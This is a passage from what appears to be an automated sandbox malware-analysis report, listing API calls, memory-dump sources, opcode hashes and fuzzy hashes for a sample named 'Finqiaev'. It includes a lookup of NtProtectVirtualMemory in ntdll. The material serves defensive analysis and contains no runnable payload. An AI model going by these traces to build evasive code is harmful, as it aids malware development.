                                                                                                                                  • \SYSTEM\CurrentControlSet\Control\Keyboard Layouts\, xrefs: 040E3075
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$AddressCloseErrorFreeLoadModeOpenProc
                                                                                                                                  • String ID: KbdLayerDescriptor$Layout File$\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
                                                                                                                                  • API String ID: 3547551084-2194312379
                                                                                                                                  • Opcode ID: 396955a1c761b652301ded0e025a998d448fe51529a1d3af04f8261d6ab1b13a
                                                                                                                                  • Instruction ID: a5d1caf85e3c9ac878b5e77131fa42ac117bfd6bde25aec7df16089bf3c46704
                                                                                                                                  • Opcode Fuzzy Hash: 396955a1c761b652301ded0e025a998d448fe51529a1d3af04f8261d6ab1b13a
                                                                                                                                  • Instruction Fuzzy Hash: 0121A170E00249AFEF01EFA5CC519EEBBBAFB89308F4184A4E840B7600D739B955CB54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(00000000), ref: 040D61A2
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 040D61B7
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000E), ref: 040D61C1
                                                                                                                                  • CreateHalftonePalette.GDI32(00000000,00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,040D4D0F,00000000,040D4D9B), ref: 040D61E5
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 040D61F0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDevice$CreateHalftonePaletteRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2404249990-0
                                                                                                                                  • Opcode ID: 7c6e7a767be6ce78f2737d223bdc8c68bb645a5318e23a15340825ae83bd1da5
                                                                                                                                  • Instruction ID: 5b52f0b4f09d99fe7f5410ba69ed1de08f542c4dceaf6672aae8009e6a827e49
                                                                                                                                  • Opcode Fuzzy Hash: 7c6e7a767be6ce78f2737d223bdc8c68bb645a5318e23a15340825ae83bd1da5
                                                                                                                                  • Instruction Fuzzy Hash: 6011CF356013A95EEB60EF34C8407EE37D1AF85359F080521FC407B181D7B6B898C7A1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • WindowFromPoint.USER32(?,?), ref: 04101CB0
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 04101CC5
                                                                                                                                  • SendMessageA.USER32(00000000,00000084,00000000,?), ref: 04101CEE
                                                                                                                                  • SendMessageA.USER32(00000000,00000020,00000000,?), ref: 04101D00
                                                                                                                                  • SetCursor.USER32(00000000), ref: 04101D12
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CurrentCursorFromPointThreadWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3188251016-0
                                                                                                                                  • Opcode ID: 0301ce3d54c7204a7a6b5ca268c7210a4c05c4d30679fed311c8ecdd25f56cd2
                                                                                                                                  • Instruction ID: 07759be879b86fa9e36c92de7dc811b5aade3a2ed65bf360fd0e62732f388ab3
                                                                                                                                  • Opcode Fuzzy Hash: 0301ce3d54c7204a7a6b5ca268c7210a4c05c4d30679fed311c8ecdd25f56cd2
                                                                                                                                  • Instruction Fuzzy Hash: 8101963610435075EA216B648CC4FBB76A8DFC5B5DF108459F5C4AB190E76AFC00936A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,040BBDD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 040BBC2F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LocaleThread
                                                                                                                                  • String ID: eeee$ggg$yyyy
                                                                                                                                  • API String ID: 635194068-1253427255
                                                                                                                                  • Opcode ID: dc4dca9b0bdb87cac3e65f93872e1945b06a31b10914b40557afa6470a9b9a0a
                                                                                                                                  • Instruction ID: 14a0ccadf13445b0e7b2c4827d1cd4e23bcd1524363ef6f688915bc72d1d099c
                                                                                                                                  • Opcode Fuzzy Hash: dc4dca9b0bdb87cac3e65f93872e1945b06a31b10914b40557afa6470a9b9a0a
                                                                                                                                  • Instruction Fuzzy Hash: CC4112607141054BF712EA69C8806FEB2FADB8120CB144425D5E1F7B55EA38FE069AEE
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 040CFC21
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040CFC27
                                                                                                                                  Strings
                                                                                                                                  • NtProtectVirtualMemory, xrefs: 040CFC17
                                                                                                                                  • C:\Windows\System32\ntdll.dll, xrefs: 040CFC1C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
                                                                                                                                  • API String ID: 1646373207-1386159242
                                                                                                                                  • Opcode ID: 9c94c21738d63fea7abee7599d785bb8ebe88ce32ed6be266fa1d4cb35bc5d31
                                                                                                                                  • Instruction ID: f81fae0adab17d58fc4b94b13874029004ddc81879ea6297e33cac5db802a7a0
                                                                                                                                  • Opcode Fuzzy Hash: 9c94c21738d63fea7abee7599d785bb8ebe88ce32ed6be266fa1d4cb35bc5d31
                                                                                                                                  • Instruction Fuzzy Hash: DBE0B6B6640209AF8B40EF99D985ECB37ECAB1C7547404404BA18E7201D635F8909BB6
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0411910B,00000000,0411911E), ref: 040BD6A6
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 040BD6B7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                  • API String ID: 1646373207-3712701948
                                                                                                                                  • Opcode ID: a06c6e4a1179ae19459379162309a1450082071a9e8e90d80bee84422057e1e8
                                                                                                                                  • Instruction ID: bef99ded1bc095ab6448fefef5bbfed9db0419d1439f568545601a4bb2da1bc4
                                                                                                                                  • Opcode Fuzzy Hash: a06c6e4a1179ae19459379162309a1450082071a9e8e90d80bee84422057e1e8
                                                                                                                                  • Instruction Fuzzy Hash: C0D05EB13963454BEB00BBB564C0AC166E8EF1025AB00052564887A220C779E882CB8C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 040ED6AB
                                                                                                                                  • MulDiv.KERNEL32(?,?,?), ref: 040ED6E6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: df7ace30612489e1ea40eac236e3200ec7f47334c344690cfcf59d127be69781
                                                                                                                                  • Instruction ID: 76a6b6501b675f5635db618cbf3abae783f90d4e85203924d3badeab06320573
                                                                                                                                  • Opcode Fuzzy Hash: df7ace30612489e1ea40eac236e3200ec7f47334c344690cfcf59d127be69781
                                                                                                                                  • Instruction Fuzzy Hash: 2FD17970A04A0ADFDB11CF7AC584AAABBF2FF48300F108959E896AB354D731F951CB51
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CursorDesktopWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3023140981-0
                                                                                                                                  • Opcode ID: 9dd4c74ace6471e94ebd61bbf4fd2a23df32c62696ca2c6e3465347deea223c5
                                                                                                                                  • Instruction ID: 58875dbf67095ec5ff49e71723c1bbf84e2a026712b6a43aa44027643f48dba4
                                                                                                                                  • Opcode Fuzzy Hash: 9dd4c74ace6471e94ebd61bbf4fd2a23df32c62696ca2c6e3465347deea223c5
                                                                                                                                  • Instruction Fuzzy Hash: 8E915A39240201CFD784EF2AE188A6977E5EFD5388F06C494E944AB356D738ECC6DB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetMenu.USER32(00000000), ref: 040FD800
                                                                                                                                  • SetMenu.USER32(00000000,00000000), ref: 040FD81D
                                                                                                                                  • SetMenu.USER32(00000000,00000000), ref: 040FD852
                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037), ref: 040FD8B5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$Window
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 939306805-0
                                                                                                                                  • Opcode ID: 49eb41a687e2310c9158e60fcf717281ed6a45716c03206449959ea3f364e01b
                                                                                                                                  • Instruction ID: ca07c70009564bc0d4ba6ef14fc4dc4c64d9932a4af5d2f51d7be96019ddfeb8
                                                                                                                                  • Opcode Fuzzy Hash: 49eb41a687e2310c9158e60fcf717281ed6a45716c03206449959ea3f364e01b
                                                                                                                                  • Instruction Fuzzy Hash: 42518230A047005BEB61EF78CC84BDA37D59F4070CF4444B5AE46BFA96DA78F8458791
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 040BF603
                                                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 040BF61F
                                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 040BF696
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 040BF6BF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 920484758-0
                                                                                                                                  • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                  • Instruction ID: 3ee12d8620de9810bd3be4b685103cbcd84d3b486f85b23b3162fff33fb8cb10
                                                                                                                                  • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                  • Instruction Fuzzy Hash: C841DA75A0161A9FDB61EF58CC90BD9B3FCAB48618F0041D5E689F7211DA74BF808F98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 040BBE59
                                                                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 040BBE7D
                                                                                                                                  • GetModuleFileNameA.KERNEL32(041497F8,?,00000105,?,?,00000105), ref: 040BBE98
                                                                                                                                  • LoadStringA.USER32(00000000,0414A678,?,00000100), ref: 040BBF2E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3990497365-0
                                                                                                                                  • Opcode ID: 1230348cf55c8a6d24c3a7ca499215201fc175a1691a016f7382f24204d92e66
                                                                                                                                  • Instruction ID: e9b3a5e8cebf806f3c0733c122f0844a83d1014843a02d391d2d452bf87c8a5b
                                                                                                                                  • Opcode Fuzzy Hash: 1230348cf55c8a6d24c3a7ca499215201fc175a1691a016f7382f24204d92e66
                                                                                                                                  • Instruction Fuzzy Hash: 49410B71A002589BEB61EB68CC84BDAB7FD9B58308F4040E5A588F7251D774BF848F99
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetKeyboardLayout.USER32(00000000), ref: 0410157D
                                                                                                                                  • GetDC.USER32(00000000), ref: 041015D2
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 041015DC
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 041015E7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDeviceKeyboardLayoutRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3331096196-0
                                                                                                                                  • Opcode ID: 3e56bb85b84a125b72250ad45bcb3b00fbc6c79cb86db7f183ebf5423b765c8e
                                                                                                                                  • Instruction ID: 7a5cd67a21bdc8b13567d183c7c36e86d81d520d89580f9c5f995bb6d7d8c339
                                                                                                                                  • Opcode Fuzzy Hash: 3e56bb85b84a125b72250ad45bcb3b00fbc6c79cb86db7f183ebf5423b765c8e
                                                                                                                                  • Instruction Fuzzy Hash: 8031DA746012419FE740EF69D8C0B8977E0EB0531CF05817AED48EF391DB7AAC488B55
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 040D2E8C: RtlEnterCriticalSection.NTDLL(0414A3A0), ref: 040D2E94
                                                                                                                                    • Part of subcall function 040D2E8C: RtlLeaveCriticalSection.NTDLL(0414A3A0), ref: 040D2EA1
                                                                                                                                    • Part of subcall function 040D2E8C: RtlEnterCriticalSection.NTDLL(00000038), ref: 040D2EAA
                                                                                                                                    • Part of subcall function 040D614C: GetDC.USER32(00000000), ref: 040D61A2
                                                                                                                                    • Part of subcall function 040D614C: GetDeviceCaps.GDI32(00000000,0000000C), ref: 040D61B7
                                                                                                                                    • Part of subcall function 040D614C: GetDeviceCaps.GDI32(00000000,0000000E), ref: 040D61C1
                                                                                                                                    • Part of subcall function 040D614C: CreateHalftonePalette.GDI32(00000000,00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,040D4D0F,00000000,040D4D9B), ref: 040D61E5
                                                                                                                                    • Part of subcall function 040D614C: ReleaseDC.USER32(00000000,00000000), ref: 040D61F0
                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 040D4D11
                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 040D4D2A
                                                                                                                                  • SelectPalette.GDI32(00000000,?,000000FF), ref: 040D4D53
                                                                                                                                  • RealizePalette.GDI32(00000000), ref: 040D4D5F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 979337279-0
                                                                                                                                  • Opcode ID: 712b1e904f6e4d0383e7727b2f33d30807bb577d3dd978a7f5c4fdc3036bab30
                                                                                                                                  • Instruction ID: 5e05bcaf8d31bee9484100764973438d6b52e4255401e2b0d7790262b8158ad4
                                                                                                                                  • Opcode Fuzzy Hash: 712b1e904f6e4d0383e7727b2f33d30807bb577d3dd978a7f5c4fdc3036bab30
                                                                                                                                  • Instruction Fuzzy Hash: 2F31F434A00618EFEB14EF59C980E9DB7F5FF48228B6645A5E804AB321D731FE44DB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 040CD6EF
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 040CD6FE
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(0414A2EC), ref: 040CD743
                                                                                                                                  • InterlockedExchange.KERNEL32(0411AAF0,?), ref: 040CD75F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread$CriticalEnterExchangeInterlockedSection
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2380408948-0
                                                                                                                                  • Opcode ID: 05ebcdcd7160c909fd92f3e0555eec053f3d21db616de716bb099503175e5e7d
                                                                                                                                  • Instruction ID: 6e144e97af80ed2b780f0f57276db6690425f646ec6e695e659f54b21679ae07
                                                                                                                                  • Opcode Fuzzy Hash: 05ebcdcd7160c909fd92f3e0555eec053f3d21db616de716bb099503175e5e7d
                                                                                                                                  • Instruction Fuzzy Hash: 69218330A44244EFEB11DBA4C894FADB7E8DF05308F518978E840F6690E779B954DF52
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongA.USER32(00000000,000000EC), ref: 04100E6C
                                                                                                                                  • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 04100E9E
                                                                                                                                  • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,040FE59C), ref: 04100ED7
                                                                                                                                  • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 04100EF0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Long$AttributesLayered
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2169480361-0
                                                                                                                                  • Opcode ID: 168a2b39845428b87b0709f9930ed6b4815906412058b50200a3e27fca0d479a
                                                                                                                                  • Instruction ID: 24001cb60010fecec3ef8146be46b7cd7188dca9b905f791be62a1163d1adf7c
                                                                                                                                  • Opcode Fuzzy Hash: 168a2b39845428b87b0709f9930ed6b4815906412058b50200a3e27fca0d479a
                                                                                                                                  • Instruction Fuzzy Hash: 85110670A0825067EF51AB789CC4BD62A8C4B0931CF0885F0B995FF1C6CBA8FD48DB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 252c6770106a75361df70907076199b145203d4218c02a64cf2bf0741655b85d
                                                                                                                                  • Instruction ID: 0d42edf934e5e09310d0bd29e890b753bd12b06edbb415170880729daed1829a
                                                                                                                                  • Opcode Fuzzy Hash: 252c6770106a75361df70907076199b145203d4218c02a64cf2bf0741655b85d
                                                                                                                                  • Instruction Fuzzy Hash: FE014F2130420C6F9774BD375C44FFB3A9DDFC5758B008478A82DAB342DA66FC2586A8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • FindResourceA.KERNEL32(?,?,?), ref: 040CA293
                                                                                                                                  • LoadResource.KERNEL32(?,040CA318,?,?,?,040C5D70,?,00000001,00000000,?,040CA1BE,00000000,?), ref: 040CA2AD
                                                                                                                                  • SizeofResource.KERNEL32(?,040CA318,?,040CA318,?,?,?,040C5D70,?,00000001,00000000,?,040CA1BE,00000000,?), ref: 040CA2C7
                                                                                                                                  • LockResource.KERNEL32(040C9E88,00000000,?,040CA318,?,040CA318,?,?,?,040C5D70,?,00000001,00000000,?,040CA1BE,00000000), ref: 040CA2D1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                  • Opcode ID: 28e7e119e039b25beda35739a3405b35bb29ee27f4b5ad7a1bbed113ed856bf2
                                                                                                                                  • Instruction ID: 476f800cc7934d2134a0eb2a61672d1ff730ba21b10906df891eb129ef33d5cd
                                                                                                                                  • Opcode Fuzzy Hash: 28e7e119e039b25beda35739a3405b35bb29ee27f4b5ad7a1bbed113ed856bf2
                                                                                                                                  • Instruction Fuzzy Hash: 05F06273604118AF6745EF6CA840DDF73ECEE882683104459FD08E7205DA36ED0187B5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SetEvent.KERNEL32(0414A748,0414A74C,04104D8A), ref: 0410259A
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0410259F
                                                                                                                                  • WaitForSingleObject.KERNEL32(0414A750,000000FF,0414A748,04104D8A), ref: 041025B4
                                                                                                                                  • CloseHandle.KERNEL32(0414A750,0414A748,04104D8A), ref: 041025BF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCurrentEventHandleObjectSingleThreadWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2257156048-0
                                                                                                                                  • Opcode ID: 2d5fc5572858bb316ebbec5571fa914dc7f24359a9fe48a419578b0ecb191f9e
                                                                                                                                  • Instruction ID: 3fe531bb1ba5eb39c8ada2c42d998e6d5e6d74aedfc35ffcc08fc1a1e14b8e73
                                                                                                                                  • Opcode Fuzzy Hash: 2d5fc5572858bb316ebbec5571fa914dc7f24359a9fe48a419578b0ecb191f9e
                                                                                                                                  • Instruction Fuzzy Hash: 8DF01C795802409FEB34EFBAD488AD537F4EB8424AB064A64A144D3580C77EFC80CF56
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 040D14D8: RtlEnterCriticalSection.NTDLL(?), ref: 040D14DC
                                                                                                                                  • CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000,Default,00000000,040D23EC,?,00000000,040D2414), ref: 040D2327
                                                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 040D23C9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CompareCreateCriticalEnterFontIndirectSectionString
                                                                                                                                  • String ID: Default
                                                                                                                                  • API String ID: 249151401-753088835
                                                                                                                                  • Opcode ID: fbc57379016c543b530d92ae2f1d8aa61118a2b7da01f5abbefa64beea0d2f16
                                                                                                                                  • Instruction ID: 86db676d76df9fcbb00bff2ba49dfa5fb451387e84e1c53e1a32c66df6fcc900
                                                                                                                                  • Opcode Fuzzy Hash: fbc57379016c543b530d92ae2f1d8aa61118a2b7da01f5abbefa64beea0d2f16
                                                                                                                                  • Instruction Fuzzy Hash: 1C615D30A04348DFEB11DFA8C540BDDBBF5AF49308F1544A9E840B7252D774AE49DB6A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d96af0684b0d16f00a178be335c228fbac4cb6f015479f48098843f005a0d9c1
                                                                                                                                  • Instruction ID: 5741fd69ab4ca20fc7b242a5a4d8fc337348d4ea0f1ffbf7538c75ffa766cd3a
                                                                                                                                  • Opcode Fuzzy Hash: d96af0684b0d16f00a178be335c228fbac4cb6f015479f48098843f005a0d9c1
                                                                                                                                  • Instruction Fuzzy Hash: 43A11A767106004BE718AA7C9CA43ED73D1DBC53A5F28427ED194EF381EB68E94583D8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
